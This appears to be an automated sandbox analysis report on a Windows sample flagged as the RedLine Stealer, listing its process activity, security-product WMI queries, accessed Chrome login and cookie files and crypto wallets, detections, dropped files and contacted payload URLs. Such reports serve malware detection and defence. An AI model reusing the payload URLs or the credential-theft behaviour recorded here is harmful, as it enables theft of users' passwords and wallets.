Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\6iWK0k820U.exe

Code function: 0_2_0040ECBC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0040ECBC

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6iWK0k820U.exe.41b788.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.41b788.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.41b788.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.6iWK0k820U.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.254324630.000000000041C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253928530.000000000041C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.252173765.0000000000522000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6iWK0k820U.exe PID: 5796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5980, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\			Jump to behavior

Source: Yara match	File source: 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5980, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.6iWK0k820U.exe.41b788.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.41b788.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.41b788.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.6iWK0k820U.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.6iWK0k820U.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.254324630.000000000041C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253928530.000000000041C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.252173765.0000000000522000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6iWK0k820U.exe PID: 5796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5980, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	711 Process Injection	31 Obfuscated Files or Information	Security Account Manager	234 System Information Discovery	SMB/Windows Admin Shares	1 Credential API Hooking	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	11 Command and Scripting Interpreter	Logon Script (Mac)	1 Scheduled Task/Job	2 Software Packing	NTDS	461 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	11 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	15 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	1 Service Execution	Rc.common	Rc.common	122 Masquerading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	1 PowerShell	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	251 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	711 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
6iWK0k820U.exe	42%	Virustotal		Browse
6iWK0k820U.exe	50%	ReversingLabs	Win32.Trojan.Strab
6iWK0k820U.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Google\chrome.exe	100%	Avira	HEUR/AGEN.1213193
C:\Users\user\AppData\Local\Temp\85AD.tmp	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Google\chrome.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\85AD.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Google\ofg.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	85%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\AppData\Local\Google\brave.exe	85%	ReversingLabs	Win64.Trojan.SpyLoader
C:\Users\user\AppData\Local\Google\chrome.exe	68%	ReversingLabs	Win32.Trojan.Lazy
C:\Users\user\AppData\Local\Google\ofg.exe	10%	ReversingLabs
C:\Users\user\AppData\Local\Temp\85AD.tmp	81%	ReversingLabs	ByteCode-MSIL.Trojan.Lazy
C:\Windows\GoogleUpdate.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
20.2.chrome.exe.10000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
56.0.chrome.exe.10000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
53.2.GoogleUpdate.exe.1b0000.0.unpack	100%	Avira	HEUR/AGEN.1246751	Download File
20.0.chrome.exe.10000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
34.2.chrome.exe.10000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
34.0.chrome.exe.10000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File
56.2.chrome.exe.10000.0.unpack	100%	Avira	HEUR/AGEN.1213193	Download File

Domains

Source	Detection	Scanner	Link
filebin.net	8%	Virustotal	Browse
api.peer2profit.com	0%	Virustotal	Browse
idpminic.org	0%	Virustotal	Browse
www.idpminic.org	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id9	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5	0%	URL Reputation	safe
http://tempuri.org/Entity/Id7	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id6Response	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://ns.ado/1.0/s6c	0%	Avira URL Cloud	safe
https://filebin.net	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id9Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id20	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22	0%	URL Reputation	safe
http://tempuri.org/Entity/Id23	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id1Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10	0%	URL Reputation	safe
http://tempuri.org/Entity/Id11	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12	0%	URL Reputation	safe
http://www.idpminic.org/aula/ofg7d45fsdfgg312.sfhg	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getzVjs	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id16Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id13	0%	URL Reputation	safe
http://tempuri.org/Entity/Id14	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15	0%	URL Reputation	safe
http://tempuri.org/Entity/Id16	0%	URL Reputation	safe
http://tempuri.org/Entity/Id17	0%	URL Reputation	safe
http://tempuri.org/Entity/Id18	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id19	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id22ResponselE	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://ns.adoboshop/Wd	0%	Avira URL Cloud	safe
http://www.idpminic.org45k	0%	Avira URL Cloud	safe
http://filebin.net	0%	Avira URL Cloud	safe
http://www.idpminic.org/aula/f429fjd4uf84u.sdfh	0%	Avira URL Cloud	safe
http://www.idpminic.orgD85k	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/getX0	0%	Avira URL Cloud	safe
http://www.idpminic.org	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get(	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get9	0%	Avira URL Cloud	safe
https://api.peer2profit.com/1	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get6	0%	Avira URL Cloud	safe
https://api.peer2profit.com/api/proxy/nodes/get	0%	Avira URL Cloud	safe
https://api.peer2profit.com/a	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
filebin.net	185.47.40.36	true	false	8%, Virustotal, Browse	unknown
api.peer2profit.com	172.66.43.60	true	true	0%, Virustotal, Browse	unknown
idpminic.org	66.235.200.147	true	false	0%, Virustotal, Browse	unknown
www.idpminic.org	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.idpminic.org/aula/ofg7d45fsdfgg312.sfhg	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get	true	Avira URL Cloud: safe	unknown
http://www.idpminic.org/aula/f429fjd4uf84u.sdfh	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
